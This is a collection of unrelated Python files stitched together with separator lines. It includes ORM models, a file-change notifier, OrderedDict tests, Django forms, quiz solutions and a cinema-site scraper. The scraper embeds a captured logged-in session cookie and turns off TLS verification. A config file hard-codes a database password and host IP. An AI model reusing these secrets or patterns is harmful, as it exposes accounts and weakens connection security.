        return '<History Geoobjects %r>' % (self.object_id)
# COMMENTS
class HistoryBadges(db.Model):
    """Badge reference for a history entry."""
    id = db.Column(db.Integer, primary_key=True, unique=True)
    badge_id = db.Column(db.Integer)

    def __init__(self, badge_id):
        self.badge_id = badge_id

    def __repr__(self):
        # BUGFIX: the expression previously lacked `return` (repr was None)
        return '<History Badges %r>' % (self.badge_id)
# COMMENTS
class HistorySocial(db.Model):
    """Social-action details for a history entry."""
    id = db.Column(db.Integer, primary_key=True, unique=True)
    social_type = db.Column(db.String(50))
    description = db.Column(db.String(500))

    def __init__(self, social_type):
        self.social_type = social_type

    def __repr__(self):
        # BUGFIX: the expression previously lacked `return` (repr was None)
        return '<History Social %r>' % (self.social_type)
# COMMENTS
class SettingsGameModes(db.Model):
    """Catalog of available game modes (short name, long name, type)."""
    name_short = db.Column(db.String(25), primary_key=True, unique=True)
    name_long = db.Column(db.String(25), primary_key=True, unique=True)
    game_type = db.Column(db.String(25))

    def __init__(self, name_short, name_long, game_type):
        self.name_short = name_short
        self.name_long = name_long
        self.game_type = game_type

    def __repr__(self):
        # BUGFIX: the expression previously lacked `return` (repr was None)
        return '<Settings Gamemodes %r>' % (self.name_short)
# COMMENTS
class Regions(db.Model):
    """Catalog of playable regions with their countries."""
    region_short = db.Column(db.String(25), primary_key=True, unique=True)
    region_full = db.Column(db.String(120), unique=True)
    country_short = db.Column(db.String(5))
    country_full = db.Column(db.String(100))

    def __init__(self, region_short, region_full, country_short, country_full):
        self.region_short = region_short
        self.region_full = region_full
        self.country_short = country_short
        self.country_full = country_full

    def __repr__(self):
        # BUGFIX: the expression previously lacked `return` (repr was None)
        return '<Regions %r>' % (self.region_short)
# COMMENTS
class Badges(db.Model):
    """Catalog of badges a player can earn, with their score value and icon."""
    badge_id = db.Column(db.Integer, primary_key=True, unique=True)
    score = db.Column(db.Integer)
    name = db.Column(db.String(25), unique=True)
    image = db.Column(db.String(25), unique=True)

    def __init__(self, score, name, image):
        self.score = score
        self.name = name
        self.image = image

    def __repr__(self):
        # BUGFIX: the expression previously lacked `return` (repr was None)
        return '<Badges %r>' % (self.name)
# COMMENTS
class OsmObjects(db.Model):
    """Catalog of OSM object types and which attributes can be verified."""
    title = db.Column(db.String(35), primary_key=True, unique=True)
    full_name = db.Column(db.String(50))
    description = db.Column(db.String(300))
    osm_page = db.Column(db.String(100))
    verify_wheelchair = db.Column(db.Boolean)
    verify_opening_hours = db.Column(db.Boolean)
    verify_smoking = db.Column(db.Boolean)
    verify_vegan = db.Column(db.Boolean)
    verify_vegetarian = db.Column(db.Boolean)
    verify_kitchen = db.Column(db.Boolean)
    verify_shelter = db.Column(db.Boolean)
    verify_bench = db.Column(db.Boolean)
    verify_bin = db.Column(db.Boolean)

    def __init__(self, title, full_name):
        self.title = title
        self.full_name = full_name

    def __repr__(self):
        # BUGFIX: the expression previously lacked `return` (repr was None)
        return '<OSM Objects %r>' % (self.title)
# COMMENTS
class ScheduleSpMotw(db.Model):
    """Weekly schedule entries for the 'Mapper of the Week' game mode."""
    week_id = db.Column(db.Integer, primary_key=True, unique=True)
    object_type = db.Column(db.String(25))  # stored as string for better reproducibility
    time_start = db.Column(db.Date())
    time_end = db.Column(db.Date())
    area = db.Column(db.String(25))  # stored as string => world/<country>/<region>

    def __init__(self, object_type, time_start, time_end, area):
        self.object_type = object_type
        self.time_start = time_start
        self.time_end = time_end
        self.area = area

    def __repr__(self):
        # BUGFIX: the expression previously lacked `return` (repr was None)
        return '<Schedule MOTW %r>' % (self.time_start)
|
# notify.py
# Copyright (C) 2011-2014 Andrew Svetlov
# andrew.svetlov@gmail.com
#
# This module is part of BloggerTool and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
import asyncore
import pyinotify
from bloggertool.log_util import class_logger
class EventProcessor(pyinotify.ProcessEvent):
    """Dispatches inotify events to the callbacks registered on the owner."""
    log = class_logger()

    def my_init(self, main):
        # pyinotify routes constructor kwargs here instead of __init__
        self.main = main

    def process_default(self, event):
        """Invoke every registered handler whose path matches the event."""
        try:
            for watched_path, callback, cb_args, cb_kwargs in self.main.handlers:
                if event.pathname == watched_path:
                    callback(*cb_args, **cb_kwargs)
        except Exception:
            self.log.exception("In notifier event handling")
class Notifier(object):
    """Watches *root* recursively and runs registered callbacks on changes."""

    def __init__(self, root):
        self.watch_manager = pyinotify.WatchManager()
        self.notifier = pyinotify.AsyncNotifier(
            self.watch_manager,
            default_proc_fun=EventProcessor(main=self))
        self.handlers = []
        # React to attribute changes and content modifications
        mask = pyinotify.IN_ATTRIB | pyinotify.IN_MODIFY
        self.watch_manager.add_watch(root, mask, rec=True)

    def add(self, path, cb, *args, **kwargs):
        """Register *cb* to be called (with the given args) when *path* changes."""
        self.handlers.append((path, cb, args, kwargs))

    def loop(self):
        """Run the asyncore event loop (blocks)."""
        asyncore.loop()
|
def get_data(path=''):
    """Read every file in *path* and return a list of their contents.

    Each file is decoded as UTF-8 and its newlines are stripped out, so
    every entry in the returned list is one single-line string per file.

    Args:
        path: directory to scan (non-recursive); defaults to the CWD-relative
            empty path, matching the original behavior.

    Returns:
        list[str]: one newline-free string per file, in os.listdir order.
    """
    import os
    documents = []
    for filename in os.listdir(path):
        with open(os.path.join(path, filename), encoding="utf-8") as f:
            # f.read() replaces the original ''.join(f.readlines());
            # unused `re` and `string` imports are dropped.
            documents.append(f.read().replace('\n', ''))
    return documents
from abc import ABC, abstractmethod
class Algorithm(ABC):
    """Common interface for machine learning algorithms.

    Concrete subclasses implement training, evaluation, prediction,
    persistence and input validation, so callers can swap algorithms
    transparently.
    """

    @abstractmethod
    def fit(self):
        """Train the algorithm."""
        pass

    @abstractmethod
    def evaluate(self, data, labels):
        """Evaluate the trained algorithm on *data* against *labels*."""
        pass

    @abstractmethod
    def predict(self, data):
        """Produce predictions for *data*."""
        pass

    @abstractmethod
    def save(self, filepath):
        """Persist a trained algorithm to *filepath*."""

    @abstractmethod
    def load(self, filepath):
        """Restore a previously saved algorithm from *filepath*."""

    @abstractmethod
    def check_data(self, data, labels):
        """Verify that *data*/*labels* are compatible with this architecture."""
|
def task1():
    """Demonstrate lexicographic tuple comparison (element by element)."""
    student_a = ('00014402', 'Sam', 'Tashkent')
    student_b = ('00014403', 'Said', 'London')
    # '00014402' < '00014403', so the whole comparison is True
    print(student_a < student_b)
def task2():
|
# 1. scope: module level
x = 5
def carp():
    # 2. scope: function level.
    # `global t` makes the assignment below create/rebind the module-level
    # name t instead of a function-local variable.
    global t
    t = 50
carp()
print(t)  # prints 50: t was created at module scope by carp()
|
# -*- coding: utf-8 -*-
"""
Author: Lily
Date: 2018-09-13
QQ: 339600718
China Film International Cinema (ChinaFilm-s)
Scraping approach: fetch each city's code from the home page, then use that code as a parameter to request the detailed data for each city.
URL (city codes): http://m.cfc.com.cn/?code=031GOyP82mrnFE0LmeP82CuyP82GOyPv&state=123
URL (per-city data): http://m.cfc.com.cn/cinema/index.html?cityCode=320100
Note: the scraped data contains several cinemas; some are not China Film International Cinema locations but may belong to the wider cinema chain.
"""
import requests
from bs4 import BeautifulSoup
import re
import datetime
from lxml import etree
from time import sleep

# Request headers captured from a logged-in WeChat mobile-browser session.
header = {
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,image/wxpic,image/sharpp,image/apng,*/*;q=0.8'
    , 'Cookie':'BIGipServerm.cfc.com.cn-h5=1348774080.20480.0000; JSESSIONID=6B0CFFE09DEC7F2BD4D95FD53F19CEBD; testKey=oEa9M02mmiTZhvlNUTJtQdAVkxBs; _openId_=oEa9M02mmiTZhvlNUTJtQdAVkxBs; _userId_=675331027835308568; _mobile_=; _user_outSystem_key_=97828efb5d20c1c3cec20eda1e5d42e5; Hm_lvt_917df978a7e1880491a42d7fddf13ae8=1536804691; Hm_lpvt_917df978a7e1880491a42d7fddf13ae8=1536828383' ,
    'User-Agent': 'Mozilla/5.0 (Linux; Android 5.1.1; vivo X7 Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/044207 Mobile Safari/537.36 MicroMessenger/6.7.2.1340(0x2607023A) NetType/WIFI Language/zh_CN'}

url = 'http://m.cfc.com.cn/?code=031GOyP82mrnFE0LmeP82CuyP82GOyPv&state=123'  # city list page
url_store = 'http://m.cfc.com.cn/cinema/index.html?cityCode='  # per-city cinema list

city_html = requests.get(url).text
soup_city = BeautifulSoup(city_html, 'lxml')
citys = soup_city.find_all(name='tt')  # one <tt> element per city

# Timestamped output file, e.g. ChinaFilm-s20180913....csv
filename = "ChinaFilm-s" + re.sub(r'[^0-9]', '', str(datetime.datetime.now())) + '.csv'
# BUG FIX: use a context manager so the CSV is closed even if an exception
# escapes the loop (the original left the handle open on failure).
with open(filename, 'w', encoding='utf-8') as f:
    f.write('citycode,city,name,address,phone' + '\n')
    for c in citys:
        print(c)
        city = c.div.string
        citycode = c['cityno']
        print(citycode)
        try:
            # verify=False disables TLS verification -- kept from the original,
            # but be aware it allows man-in-the-middle interception.
            store_html = requests.post(url_store + str(citycode), headers=header, verify=False).text
            sleep(5)  # throttle to avoid hammering the server
            store_html = etree.HTML(store_html)
            stores = store_html.xpath('//div[@id="city_hide_flag"]/a')
            total = len(stores)
            for i in range(total):
                name = store_html.xpath('//div[contains(@id,"ity_hide_flag")]/a[' + str(i + 1) + ']/div/div/div/text()')
                address = store_html.xpath('//div[contains(@id,"ity_hide_flag")]/a[' + str(i + 1) + ']/div/p[1]/samp/text()')
                phone = store_html.xpath('//div[contains(@id,"ity_hide_flag")]/a[' + str(i + 1) + ']/div/p[2]/samp/text()')
                f.write(citycode + ',' + city + ',' + name[0] + ',' + address[0] + ',' + phone[0] + ',' + '\n')
        # BUG FIX: the original bare ``except:`` also swallowed
        # KeyboardInterrupt / SystemExit; catch Exception instead.
        except Exception:
            print('无数据')
|
import torch
import numpy
import gym
class HandDesignedSampler:
    """
    Uniformly samples the input space of an env.

    Rolls out a fixed bank of hand-designed "skills" (``skill_dict``) from a
    given state and records the resulting state/action trajectories.
    """

    def __init__(self, env, idm):
        # env: environment exposing ``ego_state``, ``observation`` and ``step``
        # idm: model exposing ``forward_adj`` (distribution) and ``action``
        print('building sampler')
        self.env = env
        # Each entry is (offset, mode): a bool second element selects the
        # ``forward_adj`` branch (left/right adjustment), anything else the
        # plain deterministic policy action.
        self.skill_dict = [(1, False), (0, False), (-1, False), (1, True), (0, True), (-1, True), (1, 0), (0, 0), (-1, 0), (1.0, 0)]
        self.idm = idm
        print('built sampler')

    def sample(self, state, n_contexts, n_steps):
        """Roll out ``n_contexts`` skills for ``n_steps`` steps each from *state*.

        Returns a list of (states, actions) trajectory tuples.  The env's
        original ego_state is restored afterwards.
        NOTE(review): assumes ``n_contexts <= len(self.skill_dict)`` --
        confirm at call sites.
        """
        s = self.env.ego_state.clone()  # remember where the env was
        obs = self.env.observation
        samples = []
        for i in range(n_contexts):
            self.env.ego_state = state.clone()  # reset to the query state
            acts = []
            states = []
            aidx = self.skill_dict[i]
            for n in range(n_steps):
                if type(aidx[1]) == bool:
                    # model-adjusted action, nudged by the skill's offset
                    a = self.idm.forward_adj(obs.unsqueeze(0), left=aidx[1]).mean.squeeze()
                    a[0] += aidx[0]
                else:
                    a = self.idm.action(obs, deterministic=True)
                self.env.step(a)
                s_new = self.env.ego_state.clone()
                obs = self.env.observation
                acts.append(a)
                states.append(s_new)
            samples.append((states, acts))
        self.env.ego_state = s  # restore original env state
        return samples
|
# Most of these tests have been adapted from the stdlib OrderedDict tests.
from collections import MutableMapping
import copy
from operator import itemgetter
import pickle
from random import shuffle
import sys
from test import mapping_tests
import pytest
from schematics.common import PY2, PY3
from schematics.datastructures import OrderedDict
class GeneralMappingTests(mapping_tests.BasicTestMappingProtocol):
    # Reuse the stdlib mapping-protocol test battery against OrderedDict.
    type2test = OrderedDict

    def test_popitem(self):
        """popitem() on an empty mapping must raise KeyError."""
        d = self._empty_mapping()
        with pytest.raises(KeyError):
            d.popitem()
class MyOrderedDict(OrderedDict):
    # Trivial subclass used to re-run the mapping-protocol tests below.
    pass
class SubclassMappingTests(mapping_tests.BasicTestMappingProtocol):
    # Same battery as GeneralMappingTests, but via a subclass of OrderedDict.
    type2test = MyOrderedDict

    def test_popitem(self):
        """popitem() on an empty mapping must raise KeyError."""
        d = self._empty_mapping()
        with pytest.raises(KeyError):
            d.popitem()
def test_init():
    """Constructor accepts dict / kwargs / pair-list / mixed input, rejects junk."""
    with pytest.raises(TypeError):
        OrderedDict([('a', 1), ('b', 2)], None)  # too many args
    pairs = [('a', 1), ('b', 2), ('c', 3), ('d', 4), ('e', 5)]
    assert sorted(OrderedDict(dict(pairs)).items()) == pairs  # dict input
    assert sorted(OrderedDict(**dict(pairs)).items()) == pairs  # kwds input
    assert list(OrderedDict(pairs).items()) == pairs  # pairs input
    assert list(OrderedDict(
        [('a', 1), ('b', 2), ('c', 9), ('d', 4)], c=3, e=5).items()) == pairs  # mixed input
    # make sure no positional args conflict with possible kwdargs
    if PY2 and sys.version_info >= (2, 7, 1) or PY3 and sys.version_info >= (3, 2):
        assert list(OrderedDict(self=42).items()) == [('self', 42)]
        assert list(OrderedDict(other=42).items()) == [('other', 42)]
    with pytest.raises(TypeError):
        OrderedDict(42)
    with pytest.raises(TypeError):
        OrderedDict((), ())
    with pytest.raises(TypeError):
        OrderedDict.__init__()
    # Make sure that direct calls to __init__ do not clear previous contents
    d = OrderedDict([('a', 1), ('b', 2), ('c', 3), ('d', 44), ('e', 55)])
    d.__init__([('e', 5), ('f', 6)], g=7, d=4)
    assert (list(d.items()) ==
            [('a', 1), ('b', 2), ('c', 3), ('d', 4), ('e', 5), ('f', 6), ('g', 7)])
def test_update():
    """update() mirrors the constructor's input forms and preserves positions."""
    with pytest.raises(TypeError):
        OrderedDict().update([('a', 1), ('b', 2)], None)  # too many args
    pairs = [('a', 1), ('b', 2), ('c', 3), ('d', 4), ('e', 5)]
    od = OrderedDict()
    od.update(dict(pairs))
    assert sorted(od.items()) == pairs  # dict input
    od = OrderedDict()
    od.update(**dict(pairs))
    assert sorted(od.items()) == pairs  # kwds input
    od = OrderedDict()
    od.update(pairs)
    assert list(od.items()) == pairs  # pairs input
    od = OrderedDict()
    od.update([('a', 1), ('b', 2), ('c', 9), ('d', 4)], c=3, e=5)
    assert list(od.items()) == pairs  # mixed input
    # Issue 9137: Named argument called 'other' or 'self'
    # shouldn't be treated specially.
    if PY2 and sys.version_info >= (2, 7, 1) or PY3 and sys.version_info >= (3, 2):
        od = OrderedDict()
        od.update(self=23)
        assert list(od.items()) == [('self', 23)]
        od = OrderedDict()
        od.update(other={})
        assert list(od.items()) == [('other', {})]
        od = OrderedDict()
        od.update(red=5, blue=6, other=7, self=8)
        assert sorted(list(od.items())) == [('blue', 6), ('other', 7), ('red', 5), ('self', 8)]
    # Make sure that direct calls to update do not clear previous contents
    # add that updates items are not moved to the end
    d = OrderedDict([('a', 1), ('b', 2), ('c', 3), ('d', 44), ('e', 55)])
    d.update([('e', 5), ('f', 6)], g=7, d=4)
    assert (list(d.items()) ==
            [('a', 1), ('b', 2), ('c', 3), ('d', 4), ('e', 5), ('f', 6), ('g', 7)])
    with pytest.raises(TypeError):
        OrderedDict().update(42)
    with pytest.raises(TypeError):
        OrderedDict().update((), ())
    with pytest.raises(TypeError):
        OrderedDict.update()
def test_abc():
    """OrderedDict must register as a MutableMapping (instance and subclass)."""
    # FIX: import from collections.abc locally -- ``collections.MutableMapping``
    # (imported at the top of this file) was removed in Python 3.10; pre-3.10
    # both names are the very same object, so behavior is unchanged.
    from collections.abc import MutableMapping as ABCMutableMapping
    assert isinstance(OrderedDict(), ABCMutableMapping)
    assert issubclass(OrderedDict, ABCMutableMapping)
def test_clear():
    """clear() removes every entry regardless of insertion order."""
    data = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
    shuffle(data)
    od = OrderedDict(data)
    assert len(od) == len(data)
    od.clear()
    assert len(od) == 0
def test_delitem():
    """del removes the key, keeps relative order, and raises on a second del."""
    pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
    od = OrderedDict(pairs)
    del od['a']
    assert 'a' not in od
    with pytest.raises(KeyError):
        del od['a']
    assert list(od.items()) == pairs[:2] + pairs[3:]
def test_setitem():
    """Assignment updates existing keys in place and appends new keys."""
    od = OrderedDict([('d', 1), ('b', 2), ('c', 3), ('a', 4), ('e', 5)])
    od['c'] = 10  # overwrite keeps the key's position
    od['f'] = 20  # brand-new key goes to the end
    expected = [('d', 1), ('b', 2), ('c', 10), ('a', 4), ('e', 5), ('f', 20)]
    assert list(od.items()) == expected
@pytest.mark.parametrize('f', [lambda x: x, reversed])
def test_iterators(f):
    """Forward and reversed iteration of keys/values/items match insertion order."""
    pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
    shuffle(pairs)
    od = OrderedDict(pairs)
    assert list(f(od)) == [t[0] for t in f(pairs)]
    assert list(f(od.keys())) == [t[0] for t in f(pairs)]
    assert list(f(od.values())) == [t[1] for t in f(pairs)]
    assert list(f(od.items())) == list(f(pairs))
def test_popitem():
    """popitem() pops in LIFO order and raises KeyError once empty."""
    pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
    shuffle(pairs)
    od = OrderedDict(pairs)
    while pairs:
        assert od.popitem() == pairs.pop()
    with pytest.raises(KeyError):
        od.popitem()
    assert len(od) == 0
def test_pop():
    """pop() returns/removes values, honours defaults, ignores __missing__."""
    pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
    shuffle(pairs)
    od = OrderedDict(pairs)
    shuffle(pairs)
    while pairs:
        k, v = pairs.pop()
        assert od.pop(k) == v
    with pytest.raises(KeyError):
        od.pop('xyz')
    assert len(od) == 0
    assert od.pop(k, 12345) == 12345
    # make sure pop still works when __missing__ is defined
    class Missing(OrderedDict):
        def __missing__(self, key):
            return 0
    m = Missing(a=1)
    assert m.pop('b', 5) == 5
    assert m.pop('a', 6) == 1
    assert m.pop('a', 6) == 6
    with pytest.raises(KeyError):
        m.pop('a')
def test_equality():
    """Equality is order-sensitive vs OrderedDict, order-insensitive vs dict."""
    data = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
    shuffle(data)
    first = OrderedDict(data)
    second = OrderedDict(data)
    assert first == second  # identical order implies equality
    rotated = data[2:] + data[:2]
    second = OrderedDict(rotated)
    assert first != second  # same items, different order: unequal
    # plain dicts compare order-insensitively
    assert first == dict(second)
    assert dict(second) == first
    # dicts of different length can never compare equal
    assert first != OrderedDict(rotated[:-1])
def test_copying():
    # Check that ordered dicts are copyable, deepcopyable, picklable,
    # and have a repr/eval round-trip
    pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
    od = OrderedDict(pairs)
    def check(dup):
        # every duplicate must be a distinct but equal object
        assert dup is not od
        assert dup == od
    check(od.copy())
    check(copy.copy(od))
    check(copy.deepcopy(od))
    for proto in range(pickle.HIGHEST_PROTOCOL + 1):
        check(pickle.loads(pickle.dumps(od, proto)))
    check(eval(repr(od)))
    update_test = OrderedDict()
    update_test.update(od)
    check(update_test)
    check(OrderedDict(od))
def test_yaml_linkage():
    # Verify that __reduce__ is setup in a way that supports PyYAML's dump() feature.
    # In yaml, lists are native but tuples are not.
    pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
    od = OrderedDict(pairs)
    # yaml.dump(od) -->
    # '!!python/object/apply:__main__.OrderedDict\n- - [a, 1]\n - [b, 2]\n'
    assert all(type(pair)==list for pair in od.__reduce__()[1][0])
def test_reduce_not_too_fat():
    # do not save instance dictionary if not needed
    pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
    od = OrderedDict(pairs)
    assert od.__reduce__()[2] is None
    od.x = 10  # once an instance attribute exists, state must be pickled
    assert od.__reduce__()[2] is not None
@pytest.mark.skipif(PY2, reason='CPython issue #17900')
def test_pickle_recursive():
    """A self-referencing OrderedDict must survive a pickle round-trip."""
    od = OrderedDict()
    od['x'] = od
    rec = pickle.loads(pickle.dumps(od))
    assert list(od.keys()) == list(rec.keys())
    assert od is not rec
    assert rec['x'] is rec  # the cycle points at the copy, not the original
def test_repr():
    """repr() lists pairs in order and round-trips through eval()."""
    od = OrderedDict([('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)])
    assert (repr(od) ==
            "OrderedDict([('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)])")
    assert eval(repr(od)) == od
    assert repr(OrderedDict()) == "OrderedDict()"
def test_repr_recursive():
    # See issue #9826 -- self-references render as '...' instead of recursing.
    od = OrderedDict.fromkeys('abc')
    od['x'] = od
    assert repr(od) == "OrderedDict([('a', None), ('b', None), ('c', None), ('x', ...)])"
def test_setdefault():
    """setdefault() keeps order for existing keys, appends new ones, and
    bypasses __missing__."""
    pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
    shuffle(pairs)
    od = OrderedDict(pairs)
    pair_order = list(od.items())
    assert od.setdefault('a', 10) == 3
    # make sure order didn't change
    assert list(od.items()) == pair_order
    assert od.setdefault('x', 10) == 10
    # make sure 'x' is added to the end
    assert list(od.items())[-1] == ('x', 10)
    # make sure setdefault still works when __missing__ is defined
    class Missing(OrderedDict):
        def __missing__(self, key):
            return 0
    assert Missing().setdefault(5, 9) == 9
def test_reinsert():
    """A key that is deleted and re-added moves to the end of the order."""
    od = OrderedDict()
    od['a'] = 1
    od['b'] = 2
    del od['a']
    od['a'] = 1
    # 'a' must now come after 'b'
    assert list(od.items()) == [('b', 2), ('a', 1)]
def test_move_to_end():
    """move_to_end() relocates a key to either end and raises on missing keys."""
    od = OrderedDict.fromkeys('abcde')
    assert list(od) == list('abcde')
    od.move_to_end('c')
    assert list(od) == list('abdec')
    od.move_to_end('c', 0)  # last=0 moves to the front
    assert list(od) == list('cabde')
    od.move_to_end('c', 0)  # idempotent when already at the front
    assert list(od) == list('cabde')
    od.move_to_end('e')  # idempotent when already at the back
    assert list(od) == list('cabde')
    with pytest.raises(KeyError):
        od.move_to_end('x')
def test_override_update():
    """__init__ must not route through a subclass's overridden update()."""
    class BoomOD(OrderedDict):
        def update(self, *args, **kwds):
            raise Exception()

    data = [('a', 1), ('c', 3), ('b', 2)]
    # Construction succeeds (no Exception) and preserves input order.
    assert list(BoomOD(data).items()) == data
def test_sort():
    """sort() (schematics extension) orders in place by key func / reverse."""
    pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
    shuffled = pairs[:]
    shuffle(shuffled)
    od = OrderedDict(shuffled)
    od.sort(key=itemgetter(1))  # sort by value
    assert list(od.items()) == pairs
    shuffle(shuffled)
    od = OrderedDict(shuffled)
    od.sort()  # default: sort by key
    assert list(od.items()) == list(sorted(pairs))
    shuffle(shuffled)
    od = OrderedDict(shuffled)
    od.sort(reverse=True)
    assert list(od.items()) == list(reversed(sorted(pairs)))
|
from django import forms
class LoginForm(forms.Form):
    """Validate login form data (username + password)."""
    # BUG FIX: Django's error_messages key is 'required' (trailing 'd');
    # the original 'require' key was silently ignored, so the custom
    # messages were never shown.
    username = forms.CharField(required=True, min_length=4, max_length=10,
                               error_messages={
                                   'required': '用户名不能为空!',
                                   'min_length': '用户名不能少于4个字符!',
                                   'max_length': '用户名最多不能超过10个字符!'
                               })
    password = forms.CharField(required=True, min_length=6, max_length=16,
                               error_messages={
                                   'required': '密码不能为空!',
                                   'min_length': '密码不能少于6位!',
                                   'max_length': '密码不能超过16位!'
                               })
class RegisterForm(forms.Form):
    """Validate registration form data."""
    # BUG FIX: 'require' -> 'required' so the custom messages actually apply.
    username = forms.CharField(required=True, min_length=4, max_length=10,
                               error_messages={
                                   'required': '用户名不能为空!',
                                   'min_length': '用户名不能少于4个字符!',
                                   'max_length': '用户名最多不能超过10个字符!'
                               })
    password = forms.CharField(required=True, min_length=6, max_length=16,
                               error_messages={
                                   'required': '密码不能为空!',
                                   'min_length': '密码不能少于6位!',
                                   'max_length': '密码不能超过16位!'
                               })
    udesc = forms.CharField(required=True, min_length=5,
                            error_messages={
                                'required': '自我描述是必填项!',
                                'min_length': '自我描述不能少于5个字符!',
                            })
    sex = forms.IntegerField(required=True)
    head_img = forms.ImageField(required=False)  # avatar is optional
class AddArticle(forms.Form):
    """Validate new-article form data."""
    title = forms.CharField(min_length=5, max_length=30, required=True,
                            error_messages={
                                'required': '文章标题必填!',
                                'min_length': '标题不能少于5个字符!',
                                'max_length': '标题不能超过30个字符!'
                            })
    desc = forms.CharField(min_length=20, max_length=100, required=True,
                           error_messages={
                               'required': '文章描述必填!',
                               'min_length': '描述不能少于20个字符!',
                               'max_length': '描述不能超过100个字符!'
                           })
    content = forms.CharField(required=True,
                              error_messages={
                                  'required': '文章内容必填!'
                              })
    # cover image is mandatory when creating an article
    icon = forms.ImageField(required=True,
                            error_messages={
                                'required': '文章首图必选!'
                            })
    art_type = forms.CharField(required=True,
                               error_messages={
                                   'required': '请为你的文章选个类型吧!'
                               })
class EditArticle(forms.Form):
    """Validate article-edit form data (same as AddArticle, but the cover
    image is optional because an existing one may be kept)."""
    title = forms.CharField(min_length=5, max_length=30, required=True,
                            error_messages={
                                'required': '文章标题必填!',
                                'min_length': '标题不能少于5个字符!',
                                'max_length': '标题不能超过30个字符!'
                            })
    desc = forms.CharField(min_length=20, max_length=100, required=True,
                           error_messages={
                               'required': '文章描述必填!',
                               'min_length': '描述不能少于20个字符!',
                               'max_length': '描述不能超过100个字符!'
                           })
    content = forms.CharField(required=True,
                              error_messages={
                                  'required': '文章内容必填!'
                              })
    icon = forms.ImageField(required=False)
    art_type = forms.CharField(required=True,
                               error_messages={
                                   'required': '请为你的文章选个类型吧!'
                               })
class CatType(forms.Form):
    """Validate category-type form data."""
    # BUG FIX: 'require' -> 'required' so the message is actually used.
    type_name = forms.CharField(max_length=20, required=True,
                                error_messages={
                                    'required': '类型名不能为空!',
                                    'max_length': '类型名不能超过20个字符!'
                                })
    f_type_id = forms.CharField(required=False)  # optional parent-type id
class UserInfo(forms.Form):
    """Validate profile-edit form data."""
    # BUG FIXES: 'require' -> 'required'; the password min_length message
    # said "4" while the constraint is 6 -- corrected to match.
    # NOTE(review): username max_length=31 but the message says 30 --
    # confirm which limit is intended.
    username = forms.CharField(max_length=31, required=True, min_length=4,
                               error_messages={
                                   'required': '用户名不能为空!',
                                   'max_length': '用户名不能超过30个字符!',
                                   'min_length': '用户名不能少于4个字符!'
                               })
    password = forms.CharField(required=False, min_length=6, max_length=16,
                               error_messages={
                                   'required': '密码不能为空!',
                                   'max_length': '密码不能超过16个字符!',
                                   'min_length': '密码不能少于6个字符!'
                               })
    udesc = forms.CharField(required=False)
    sex = forms.CharField(required=True)
    head_img = forms.ImageField(required=False)
    birth = forms.DateField(required=False)
|
# Data file locations
DATA_DIR = './data/'
DATA_SOURCE_FILE = 'source.csv'
DATA_SAVE_FILE = 'dataset.pickle'

# SECURITY NOTE(review): database credentials are hard-coded in source;
# move them to environment variables or a config file kept out of VCS.
DB_USER = 'ethan'
DB_PASS = 'qwerasdf'
DB_HOST = '120.76.126.214'
DB_NAME = 'soccer'

TREND_MAX_HOUR = 6  # hours of history used per sample
NUM_LABELS = 8
# 12 * 6 per hour -- presumably snapshots-per-hour times fields-per-snapshot,
# plus 2 extra scalar features; verify against the dataset builder.
FEATURE_SIZE = TREND_MAX_HOUR * 12 * 6 + 2
|
from django.urls import path
from . import views
app_name = "exhibition"  # URL namespace for reverse() lookups

# All routes delegate to class-based views via as_view().
urlpatterns = [
    path('init/', views.InitialExhibition.as_view()),
    path('exhibition/', views.Exhibition.as_view()),
    path('exhibition/detail/artwork/', views.ExhibitionDetailByArtwork.as_view()),
    path('exhibition/view/', views.ExhibitionView.as_view()),
]
|
# NO IMPORTS!
##################################################
### Problem 1: batch
##################################################
def batch(inp, size):
    """Greedily split *inp* into consecutive batches.

    Elements are appended to the current batch until the batch's running
    sum reaches *size*; the batch is then closed and a new one begins.
    A final partial batch (sum < size) is kept.
    """
    batches = []
    bucket = []
    total = 0
    for value in list(inp):
        bucket.append(value)
        total += value
        if total >= size:
            # batch is full: close it and start a fresh one
            batches.append(bucket)
            bucket, total = [], 0
    if bucket:
        batches.append(bucket)  # trailing partial batch
    return batches
##################################################
### Problem 2: order
##################################################
def order(inp):
    """Return *inp* regrouped by first letter, per quiz specification.

    Repeatedly takes the first letter of the earliest remaining word and
    moves every word starting with that letter (in original order) to the
    output, until no words remain.
    """
    result = []
    remaining = inp
    while len(remaining) > 0:
        lead = remaining[0][0]
        leftovers = []
        for word in remaining:
            # words matching the leading letter go straight to the output
            (result if word[0] == lead else leftovers).append(word)
        remaining = leftovers
    return result
##################################################
### Problem 3: path_to_happiness
##################################################
def path_to_happiness(field):
    """Return a path through field of smiles that maximizes happiness.

    *field* is a dict with "nrows", "ncols" and a row-major "smiles" grid.
    The path visits one row per column, moving at most one row up/down
    between adjacent columns; the returned list holds the row chosen for
    each column.

    BUG FIX vs the original: running maxima were initialised to 0, which
    broke fields containing zero or negative smile values (an all-zero
    field even returned an empty path).  Maxima are now taken over the
    actual candidates, so any numeric smile values work.
    """
    rows = field["nrows"]
    cols = field["ncols"]
    smiles = field["smiles"]
    # best_smiles[r] / best_paths[r]: best total and path ending at row r
    # for the columns processed so far (dynamic programming over columns).
    best_smiles = [smiles[r][0] for r in range(rows)]
